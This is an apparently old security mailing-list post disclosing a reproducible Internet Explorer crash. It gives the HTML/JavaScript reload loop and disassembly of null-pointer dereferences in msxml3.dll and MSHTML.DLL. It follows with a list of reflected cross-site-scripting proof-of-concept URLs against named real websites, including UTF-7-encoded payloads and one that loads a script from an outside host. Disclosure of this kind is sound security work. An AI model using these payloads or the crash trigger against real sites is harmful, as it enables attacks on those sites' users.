Hi,<br><br>I have found ie crashing when refreshing an iframe containing an xml file with xsl stylesheet (takes a while to crash).<br><br>I used this html:<br>------------------------------<div style="direction: ltr;">---<br>
&lt;html&gt;<br>&lt;head&gt;<br>&lt;script language=&quot;javaScript&quot;&gt;<br>function refresh() {<br> &nbsp; frames[0].window.location.reload();<br>&nbsp; setTimeout(&quot;refresh();&quot;, 20);<br>}<br>&lt;/script&gt;<br>&lt;/head&gt;
<br>&lt;body&gt;&lt;iframe src=&quot;input.xml&quot;&gt;&lt;/iframe&gt;<br>&lt;script&gt;<br>refresh();<br>&lt;/script&gt;<br>&lt;/body&gt;<br>&lt;/html&gt;<br><br>----------------------------------<br>&nbsp;input.xml is calling an xsl stylesheet (cfr. attachment)
<br>&lt;?xml version=&quot;1.0&quot;?&gt;<br>&lt;?xml-stylesheet type=&quot;text/xsl&quot; href=&quot;style2.xsl&quot;?&gt;<br><br>----------------------------------<br>w2k:<br>msxml3.dll:69B76B61 mov &nbsp; &nbsp; eax, [esi]<br>msxml3.dll
:69B76B63 mov &nbsp; &nbsp; ecx, esi<br>msxml3.dll:69B76B65 call &nbsp; &nbsp;dword ptr [eax+48h]<br>with esi=0<br><br>MSHTML.DLL:637840E8 test &nbsp; &nbsp;byte ptr [eax+44Dh], 20h<br>with eax=0<br><br>xp:<br>msxml3.dll:74992156&nbsp;&nbsp; 8B43 14&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; MOV EAX,DWORD PTR DS:[EBX+14]
<br>EBX=0<br><br>seem like nullpointer derefs.<br>Weird thing it crashes on different addies, somebody can shed some light on why is this?<br></div><br>obligatory xss:<br><br><a href="http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;start=1&amp;nodeid=&amp;fid=&amp;showSimilarDoc=true&amp;group=All" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://search.oracle.com/search/search?keyword=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;start=1&amp;nodeid=&amp;fid=&amp;showSimilarDoc=true&amp;group=All</a> secure search, lol?<br><a href="http://oreilly.com/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

oreilly.com</a>: search powered by <a href="http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-a=sp1000a5a9&amp;sp-f=ISO-8859-1&amp;sp-t=general&amp;sp-x-1=cat&amp;sp-q-1=&amp;sp-x-2=cat2&amp;sp-q-2=&amp;sp-c=25&amp;sp-p=all&amp;sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&amp;c=&amp;p=" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://promosearch.atomz.com/search/promosearch?query=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-q=%27%3B+--%3E%3C%2Fscript%3E+%3Cscript%3Ealert%281%29%3B%3C%2Fscript%3E&amp;sp-a=sp1000a5a9&amp;sp-f=ISO-8859-1&amp;sp-t=general&amp;sp-x-1=cat&amp;sp-q-1=&amp;sp-x-2=cat2&amp;sp-q-2=&amp;sp-c=25&amp;sp-p=all&amp;sp-k=Articles%7CBooks%7CConferences%7COther%7CWeblogs&amp;c=&amp;p=
</a><br><a href="http://www.altavista.com/web/results?itag=ody&amp;q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;kgs=1&amp;kls=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://www.altavista.com/web/results?itag=ody&amp;q=%3C%2Ftitle%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E&amp;kgs=1&amp;kls=0
</a><br><a href="http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert%281%29%3C/script%3Ey00&amp;source=cnn&amp;url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://audience.cnn.com/services/cnn/memberservices/member_register.jsp?pid=%22%3E%3Cscript%3Ealert(1)%3C/script%3Ey00&amp;source=cnn&amp;url=http%3A%2F%2Faudience.cnn.com%2Fservices%2Fcnn%2Fmemberservices%2Fregwall%2Fmember_profile.jsp%3Fsource%3Dcnn
</a><br><a href="http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;qsrc=1&amp;o=333&amp;l=dir" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">
http://www.ask.com/web?q=%2BADw-%2Ftitle%2BAD4-%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;qsrc=1&amp;o=333&amp;l=dir
</a><br><a href="http://search.amd.com/query.html?col=idx1&amp;qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&amp;charset=iso-8859-1&amp;qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&amp;qs=%7C+language%3Aen&amp;la=en&amp;lap=en&amp;qm=1&amp;tqmhak=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://search.amd.com/query.html?col=idx1&amp;qt=amd+%22%3E+%3Cscript%3E+alert%281%29+%3C%2Fscript%3E&amp;charset=iso-8859-1&amp;qp=url%3A%2Fus-en%2F+url%3A%2Fsg-en%2F+url%3A%2Fepd%2F&amp;qs=%7C+language%3Aen&amp;la=en&amp;lap=en&amp;qm=1&amp;tqmhak=0
</a><br><a href="http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&amp;url=search-alias%3Daps&amp;field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;Go.x=11&amp;Go.y=10" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://www.amazon.com/s/ref=nb_ss_gw/103-7930143-9476650?ie=UTF-8&amp;url=search-alias%3Daps&amp;field-keywords=%2BADw-SCRIPT%2BAD4-alert%28%27XSS%27%29%3B%2BADw-%2FSCRIPT%2BAD4-&amp;Go.x=11&amp;Go.y=10</a><br><a href="http://search.hp.com/query.html?charset=iso-8859-1&amp;la=en&amp;hpvc=sitewide&amp;qs=&amp;nh=10&amp;lk=1&amp;rf=0&amp;uf=1&amp;st=1&amp;qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&amp;submitsearch.x=0&amp;submitsearch.y=0" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">

http://search.hp.com/query.html?charset=iso-8859-1&amp;la=en&amp;hpvc=sitewide&amp;qs=&amp;nh=10&amp;lk=1&amp;rf=0&amp;uf=1&amp;st=1&amp;qt=hp+%27%22y00--%3E%3C%2Fscript%3E%3Cscript+src%3Dhttp%3A%2F%2Fyoufucktard.com%2Fxss.js%3E&amp;submitsearch.x=0&amp;submitsearch.y=0
</a><br><a href="http://us.mcafee.com/virusInfo/" target="_blank" onclick="return top.js.OpenExtLink(window,event,this)">http://us.mcafee.com/virusInfo/</a> : enter following in virus search: (use POST form for exploit)<br>
&quot;&gt;&lt;script&gt;alert(1)&lt;/script&gt;<br><br><br>cheers,<br>Thomas<br>